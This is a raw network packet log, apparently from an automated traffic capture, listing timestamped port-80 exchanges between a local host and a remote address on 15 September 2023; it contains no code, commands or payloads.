                                                                                                                                                                              Sep 15, 2023 07:26:57.132287025 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.132303953 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.132348061 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.132358074 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.132400990 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.132419109 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.132468939 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.132489920 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.132539988 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.132910967 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.132962942 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.133018017 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.133061886 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.133074045 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.133111954 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.133193970 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.133244991 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.133294106 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.133343935 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.133363962 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.133402109 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.133414984 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.133452892 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.133744001 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.133784056 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.133797884 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.133821964 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.133835077 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.133862972 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.133873940 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.133902073 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.133944988 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.133963108 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.133981943 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.134000063 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.134040117 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.134368896 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.134469032 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.134509087 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.134531021 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.134531021 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.134551048 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.134557009 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.134598017 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.134622097 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.134668112 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.134689093 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.134740114 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.134758949 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.134808064 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.135278940 CEST4995480192.168.2.3108.167.164.216
                                                                                                                                                                              Sep 15, 2023 07:26:57.135292053 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.135332108 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.135369062 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.135418892 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.135438919 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.135448933 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.135487080 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.135499954 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.135541916 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.135616064 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.135725975 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.135732889 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.135833025 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.136569977 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.136671066 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.136682987 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.136724949 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.136745930 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.136817932 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.136845112 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.136874914 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.136936903 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.137005091 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.137028933 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.137056112 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.137084961 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.137137890 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.137217045 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.137255907 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.137320042 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.137340069 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.137358904 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.137406111 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.137428999 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.137497902 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.137506008 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.137552977 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.137602091 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.137650013 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.137670994 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.137770891 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.137917042 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.138025999 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.138258934 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.138355017 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.138391972 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.138396978 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.138411045 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.138456106 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.138469934 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.138561964 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.138571978 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.138612986 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.138622046 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.138663054 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.138715982 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.138782024 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.138968945 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.139008999 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.139074087 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.139092922 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.139097929 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.139142036 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.139148951 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.139189959 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.139399052 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.139437914 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.139504910 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.139522076 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.139523983 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.139571905 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.139861107 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.139904022 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.139975071 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.139977932 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.139995098 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.140017033 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.140027046 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.140074015 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.140095949 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.140187025 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.140193939 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.140234947 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.140247107 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.140283108 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.140739918 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.140779018 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.140846968 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.140866995 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.140882969 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.140930891 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.140984058 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.141022921 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.141061068 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.141083002 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.141098022 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.141102076 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.141119957 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.141144037 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.141657114 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.141695976 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.141766071 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.141772985 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.141786098 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.141813040 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.141819000 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.141865015 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.141912937 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.141968966 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.141983032 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.142026901 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.142082930 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.142154932 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.142558098 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.142599106 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.142659903 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.142666101 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.142685890 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.142700911 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.142704964 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.142749071 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.142772913 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.142843962 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.142852068 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.142893076 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.142915010 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.142965078 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.143451929 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.143527985 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.143562078 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.143591881 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.143615961 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.143657923 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.143687010 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.143733025 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.143752098 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.143795013 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.143826962 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.143865108 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.143872976 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.143907070 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.144248962 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.144359112 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.144382954 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.144407034 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.144413948 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.144463062 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.144465923 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.144515038 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.144563913 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.144613028 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.144639015 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.144695044 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.144695997 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.144742966 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.144750118 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.144795895 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.145454884 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.145534992 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.145559072 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.145586967 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.145607948 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.145654917 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.145689011 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.145752907 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.145766020 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.145812035 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.145827055 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.145870924 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.145900965 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.145972967 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.146275997 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.146353960 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.146372080 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.146399021 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.146406889 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.146450043 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.146455050 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.146497965 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.146570921 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.146644115 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.146668911 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.146697998 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.146794081 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.146887064 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.147079945 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.147142887 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.147176027 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.147191048 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.147192955 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.147234917 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.147267103 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.147301912 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.147355080 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.147366047 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.147397995 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.147413969 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.147459030 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.147975922 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.148057938 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.148072958 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.148081064 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.148108959 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.148138046 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.148160934 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.148232937 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.148416042 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.148437023 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.148515940 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.148545980 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.148583889 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.148639917 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.148880959 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.148972034 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.149048090 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.149105072 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.149148941 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.149158955 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.149167061 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.149204969 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.149252892 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.149315119 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.149318933 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.149365902 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.149414062 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.149460077 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.149832964 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.149915934 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.149930000 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.149955988 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.149964094 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.150007010 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.150096893 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.150177956 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.150192976 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.150221109 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.150290012 CEST8049932104.26.14.53192.168.2.3
